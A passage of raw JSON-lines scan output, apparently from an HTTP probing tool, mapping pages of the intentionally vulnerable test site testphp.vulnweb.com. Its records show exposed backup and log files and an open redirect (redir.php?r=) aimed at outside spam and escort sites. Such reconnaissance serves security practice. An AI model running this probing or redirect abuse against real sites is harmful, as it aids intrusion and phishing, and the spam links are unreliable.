\"lines\":19,\"status_code\":200,\"content_length\":3725,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.859051545Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/newsastists.php\",\"input\":\"http://testphp.vulnweb.com:80/newsastists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/newsastists.php\",\"time\":\"360.784856ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.865601078Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/logout.php\",\"input\":\"http://testphp.vulnweb.com:80/logout.php\",\"title\":\"logout\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logout.php\",\"time\":\"345.458378ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":492,\"lines\":107,\"status_code\":200,\"content_length\":4830,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.103103538Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/wp-config.bak\",\"input\":\"http://testphp.vulnweb.com:80/pictures/wp-config.bak\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/wp-config.bak\",\"time\":\"348.592063ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":207,\"lines\":32,\"status_code\":200,\"content_length\":1535,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.107751107Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/wp-admin\",\"input\":\"http://testphp.vulnweb.com:80/pictures/wp-admin\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/wp-admin\",\"time\":\"352.086067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.106170168Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/8.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/8.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/8.jpg.tn\",\"time\":\"349.617521ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":26,\"status_code\":200,\"content_length\":4139,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.11259142Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/privacy.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/privacy.php\",\"time\":\"348.235436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.115646465Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/picutures\",\"input\":\"http://testphp.vulnweb.com:80/picutures\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/picutures\",\"time\":\"355.1933ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.12260325Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/WS_FTP.LOG\",\"input\":\"http://testphp.vulnweb.com:80/pictures/WS_FTP.LOG\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/WS_FTP.LOG\",\"time\":\"343.940359ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":64,\"lines\":10,\"status_code\":200,\"content_length\":771,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.125462739Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/ipaddresses.txt\",\"input\":\"http://testphp.vulnweb.com:80/pictures/ipaddresses.txt\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/ipaddresses.txt\",\"time\":\"358.737464ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":7,\"status_code\":200,\"content_length\":52,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.122441095Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/path-disclosure-unix.html\",\"input\":\"http://testphp.vulnweb.com:80/pictures/path-disclosure-unix.html\",\"title\":\"Pierre\\u0026Vacances\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/path-disclosure-unix.html\",\"time\":\"341.170009ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":291,\"lines\":59,\"status_code\":200,\"content_length\":3936,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.126388136Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/picutes\",\"input\":\"http://testphp.vulnweb.com:80/picutes\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/picutes\",\"time\":\"353.371067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.120989099Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/6.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/6.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/6.jpg.tn\",\"time\":\"351.537978ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":30,\"lines\":32,\"status_code\":200,\"content_length\":4345,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.127700155Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/path-disclosure-win.html\",\"input\":\"http://testphp.vulnweb.com:80/pictures/path-disclosure-win.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/path-disclosure-win.html\",\"time\":\"354.7984ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":73,\"lines\":16,\"status_code\":200,\"content_length\":698,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.132158388Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/7.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/7.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/7.jpg.tn\",\"time\":\"358.889919ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":32,\"status_code\":200,\"content_length\":6458,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.137201105Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php\",\"input\":\"http://testphp.vulnweb.com:80/product.php?\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php\",\"time\":\"344.491618ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:44.141587912Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=1\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=1\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1\",\"time\":\"345.164237ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":655,\"lines\":117,\"status_code\":200,\"content_length\":6428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.932631327Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://bit.do/fzCq7\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://bit.do/fzCq7\",\"location\":\"http://bit.do/fzCq7\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bit.do/fzCq7\",\"time\":\"343.938871ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.938046902Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php\",\"input\":\"http://testphp.vulnweb.com:80/redir.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php\",\"time\":\"351.626266ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.940540681Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/productlist.php\",\"input\":\"http://testphp.vulnweb.com:80/productlist.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/productlist.php\",\"time\":\"345.313648ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.942854802Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://firlute4.site123.me/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://firlute4.site123.me/\",\"location\":\"http://firlute4.site123.me/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://firlute4.site123.me/\",\"time\":\"356.227609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.943186042Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://1tip88.com/m88\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://1tip88.com/m88\",\"location\":\"http://1tip88.com/m88\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://1tip88.com/m88\",\"time\":\"356.4764ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.947929805Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://bit.do/foApe\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://bit.do/foApe\",\"location\":\"http://bit.do/foApe\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bit.do/foApe\",\"time\":\"355.394975ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.94829469Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://bit.do/fofXJ\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://bit.do/fofXJ\",\"location\":\"http://bit.do/fofXJ\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://bit.do/fofXJ\",\"time\":\"343.823796ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.952905218Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/products\",\"input\":\"http://testphp.vulnweb.com:80/products\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/products\",\"time\":\"345.215998ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.957903241Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://drillpm.com\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://drillpm.com\",\"location\":\"http://drillpm.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://drillpm.com\",\"time\":\"347.999754ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.961986585Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=7\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=7\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=7\",\"time\":\"341.808674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":532,\"lines\":111,\"status_code\":200,\"content_length\":5734,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.961802874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=5\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=5\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=5\",\"time\":\"353.381427ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":648,\"lines\":116,\"status_code\":200,\"content_length\":6382,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.964269636Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/questbook.php\",\"input\":\"http://testphp.vulnweb.com:80/questbook.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/questbook.php\",\"time\":\"354.711058ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.963248128Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=3\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=3\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=3\",\"time\":\"340.868993ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":652,\"lines\":117,\"status_code\":200,\"content_length\":6401,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.962567682Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=6\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=6\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=6\",\"time\":\"357.661899ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":118,\"status_code\":200,\"content_length\":6454,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.968331194Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=4\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=4\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=4\",\"time\":\"348.140587ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":118,\"status_code\":200,\"content_length\":6453,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:45.969686783Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/product.php?pic=2\",\"input\":\"http://testphp.vulnweb.com:80/product.php?pic=2\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=2\",\"time\":\"351.867205ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":646,\"lines\":117,\"status_code\":200,\"content_length\":6368,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.872208673Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=http://www.bga.com.tr/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=http://www.bga.com.tr/\",\"location\":\"http://www.bga.com.tr/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://www.bga.com.tr/\",\"time\":\"348.937544ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.87222539Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://onlinevipservices.com/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://onlinevipservices.com/\",\"location\":\"https://onlinevipservices.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://onlinevipservices.com/\",\"time\":\"343.210803ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.872233259Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"location\":\"https://www.shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.shreya-singh.com/escorts/escort-services-in-jaipur.html\",\"time\":\"352.21148ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.87375537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.yamithakur.com/call-girls-in-sector-21-faridabad.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.yamithakur.com/call-girls-in-sector-21-faridabad.html\",\"location\":\"https://www.yamithakur.com/call-girls-in-sector-21-faridabad.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.yamithakur.com/call-girls-in-sector-21-faridabad.html\",\"time\":\"339.504087ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.873831451Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.callgirlsindelhiescorts.com/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.callgirlsindelhiescorts.com/\",\"location\":\"https://www.callgirlsindelhiescorts.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.callgirlsindelhiescorts.com/\",\"time\":\"352.130166ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.880309043Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.priyaji.com/gurgaon-escorts.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.priyaji.com/gurgaon-escorts.html\",\"location\":\"https://www.priyaji.com/gurgaon-escorts.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.priyaji.com/gurgaon-escorts.html\",\"time\":\"347.503187ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.880393905Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://4serial.com/\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://4serial.com/\",\"location\":\"https://4serial.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://4serial.com/\",\"time\":\"339.158193ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:47.88045601Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.jaipurhotelescorts.com/escorts/russian-escorts-in-jaipur.html\",\"input\":\"http://testphp.vulnweb.com:80/redir.php?r=https://www.jaipurhotelescorts.com/escorts/russian-escorts-in-jaipur.html\",\"location\":\"https://www.jaipurhotelescorts.com/escorts/russian-escorts-in-jaipur.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=https://www.jaipurhotelescorts.com/escorts/russian-escorts-in-jaipur.html\",\"time\":\"338.917128ms